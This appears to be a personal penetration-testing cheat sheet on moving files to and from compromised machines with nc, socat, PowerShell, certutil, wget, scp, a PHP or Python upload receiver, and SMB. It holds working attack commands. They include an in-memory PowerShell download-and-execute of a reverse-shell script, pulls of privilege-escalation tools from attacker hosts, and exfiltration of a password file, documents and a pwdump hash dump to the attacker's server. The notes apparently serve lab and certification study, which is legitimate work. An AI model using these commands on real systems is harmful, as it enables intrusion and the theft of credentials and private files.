Pentest Notes

File Transfer

nc

Receiving machine:

nc -nlvp 4444 > incoming.exe

Sending machine:

nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe

socat

Sending (serve the file to whoever connects):

sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

Receiving (each nc command followed by its socat equivalent):

nc <remote server's ip address> 80
socat - TCP4:<remote server's ip address>:80

sudo nc -lvp localhost 443
sudo socat TCP4-LISTEN:443 STDOUT

PowerShell

Set-ExecutionPolicy Unrestricted

Download a file and save it to a specific path:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"

Download a script and run it in memory, without saving it to disk:

powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.14.5/Invoke-PowerShellTcp.ps1')

Basic invocation (Invoke-WebRequest):

invoke-webrequest -uri http://10.10.14.5/JuicyPotato.exe -outfile jp.exe

certutil

certutil -urlcache -f http://10.10.16.2:8899/winpeas.bat winpeas.bat

wget

wget http://10.50.121.50:8000/LinPEAS.sh -O lp.sh

Note the capital -O: it names the output file. Lowercase -o names wget's log file, so the download itself would still land in LinPEAS.sh.

scp

From the attacker machine:

scp ariah@192.168.130.99:C:/ftp/Infrastructure.pdf .

A password will be required, and sshd has to be running on the victim (the source of the file). If necessary, start it:

systemctl start ssh.socket 

Windows Exfiltration

If everything is disabled, usually HTTP outbound is still allowed.

Create the upload.php file and save it in /var/www/html on kali:

<?php
$uploaddir = '/var/www/uploads/';
// basename() keeps a crafted file name from writing outside $uploaddir
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>

This processes an incoming file request and saves the transferred data to /var/www/uploads.

Next, create the uploads folder and give www-data write permission on it.

Then trigger the upload from the victim:

powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')

The IP in the URL is the kali machine hosting upload.php; important.docx should now be in the kali uploads directory.
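As an added example (not part of the original notes), here is a Python stand-in for upload.php that needs no Apache or PHP: it parses the multipart/form-data POST that WebClient.UploadFile sends, reduces the client-supplied file name to a bare basename, and writes the file into the uploads directory. The UPLOAD_DIR default, the listening port, the function names and the constructed sample body are all assumptions made for this example.

```python
#!/usr/bin/env python3
"""Python stand-in for the upload.php receiver (added example, not from the notes).

Accepts a multipart/form-data POST carrying a part named 'file' and stores it
under UPLOAD_DIR. Everything in the request, including the file name, is chosen
by the sending side, so the name is reduced to a bare basename before use.
"""
import os
import re
import tempfile
from http.server import BaseHTTPRequestHandler, HTTPServer

# Same directory the PHP version writes to (assumption; override via env to run anywhere).
UPLOAD_DIR = os.environ.get("UPLOAD_DIR", "/var/www/uploads")


def safe_name(client_name: str) -> str:
    """Return the last path component of a client-supplied file name.

    Both '/' and '\\' count as separators (the sender may be a Windows host),
    and names that resolve to the directory itself or its parent are refused.
    """
    name = re.split(r"[\\/]", client_name)[-1]
    if name in ("", ".", ".."):
        raise ValueError("refusing unsafe file name: %r" % client_name)
    return name


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Parse a multipart/form-data body into {field_name: (filename, data)}.

    filename is None for ordinary (non-file) form fields.
    """
    fields = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):      # closing delimiter: no more parts
            break
        if chunk.startswith(b"\r\n"):    # CRLF that ends the delimiter line
            chunk = chunk[2:]
        headers, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):       # CRLF that precedes the next delimiter
            data = data[:-2]
        header_text = headers.decode("latin-1")
        name = re.search(r'[;\s]name="([^"]*)"', header_text)
        filename = re.search(r'filename="([^"]*)"', header_text)
        if name:
            fields[name.group(1)] = (filename.group(1) if filename else None, data)
    return fields


def save_upload(fields: dict, upload_dir: str, field: str = "file") -> str:
    """Write the uploaded part to upload_dir and return the path written."""
    if field not in fields or fields[field][0] is None:
        raise ValueError("request has no file part named %r" % field)
    client_name, data = fields[field]
    path = os.path.join(upload_dir, safe_name(client_name))
    with open(path, "wb") as fh:
        fh.write(data)
    return path


class UploadHandler(BaseHTTPRequestHandler):
    """Handles POST /upload.php the way the PHP script does."""

    def do_POST(self):
        match = re.search(r"boundary=([^;]+)", self.headers.get("Content-Type", ""))
        body = self.rfile.read(int(self.headers.get("Content-Length", "0")))
        try:
            if not match:
                raise ValueError("expected multipart/form-data")
            boundary = match.group(1).strip().strip('"').encode("latin-1")
            path = save_upload(parse_multipart(body, boundary), UPLOAD_DIR)
        except ValueError as exc:
            self.send_response(400)
            self.end_headers()
            self.wfile.write(("%s\n" % exc).encode())
            return
        self.send_response(200)
        self.end_headers()
        self.wfile.write(("saved %s\n" % path).encode())


def build_multipart(filename: str, data: bytes, boundary: bytes = b"X-EXAMPLE") -> bytes:
    """Construct the kind of body WebClient.UploadFile sends (constructed sample)."""
    return b"".join([
        b"--", boundary, b"\r\n",
        b'Content-Disposition: form-data; name="file"; filename="', filename.encode(), b'"\r\n',
        b"Content-Type: application/octet-stream\r\n\r\n",
        data, b"\r\n--", boundary, b"--\r\n",
    ])


def roundtrip_demo() -> tuple:
    """Parse a constructed upload, store it in a temp dir, return (basename, bytes)."""
    body = build_multipart("..\\important.docx", b"constructed sample content")
    path = save_upload(parse_multipart(body, b"X-EXAMPLE"), tempfile.mkdtemp())
    with open(path, "rb") as fh:
        return os.path.basename(path), fh.read()


if __name__ == "__main__":
    os.makedirs(UPLOAD_DIR, exist_ok=True)
    print("uploads will be written to", UPLOAD_DIR)
    HTTPServer(("0.0.0.0", 80), UploadHandler).serve_forever()   # port 80 is an assumption
```

Run it as root (or change the port) on the kali box and point the same UploadFile call at it; the file name is sanitized on the receiving end, since whatever the sending side puts in the multipart header would otherwise become part of the path written under the uploads directory.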

SMB

My personal fave, great for Windows machines.

smbserver.py <SHARENAME> . --smb2support

Copy to the remote machine:

copy \\192.168.119.153\sharez\nc.exe "C:\Documents and Settings\no\nc.exe"

Copy to kali:

copy "C:\Documents and Settings\no\127.0.0.1.pwdump" \\192.168.119.153\sharez\127.0.0.1.pwdump

Last updated 2 years ago